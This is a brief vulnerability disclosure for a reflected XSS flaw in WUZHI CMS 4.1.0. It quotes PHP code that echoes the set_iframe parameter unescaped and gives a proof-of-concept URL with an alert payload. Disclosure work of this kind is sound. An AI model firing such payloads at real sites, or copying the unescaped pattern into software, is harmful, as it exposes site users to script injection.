A xss vulnerability was discovered in WUZHI CMS 4.1.0
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the set_iframe parameter of /index.php?m=content&f=postinfo&v=listing
Vulnerability file: coreframe/app/content/postinfo.php
function __construct() {
$this->member = load_class('member', 'member');
load_function('common', 'member');
$this->member_setting = get_cache('setting', 'member');
parent::__construct();
//判断当前是否验证了邮箱和手机
if(!$this->memberinfo['ischeck_email']) {
MSG('请先验证您的邮箱!','?m=member&f=index&v=edit_email&set_iframe='.$GLOBALS['set_iframe'],3000);
}
if($this->member_setting['checkmobile'] && !$this->memberinfo['ischeck_mobile']) {
MSG('您的手机还未验证!请先验证!','index.php?m=member&f=index&v=edit_mobile&set_iframe='.$GLOBALS['set_iframe'],3000);
}
}
PoC:
http://example.com/index.php?m=content&f=postinfo&v=listing&set_iframe='-alert(1)-'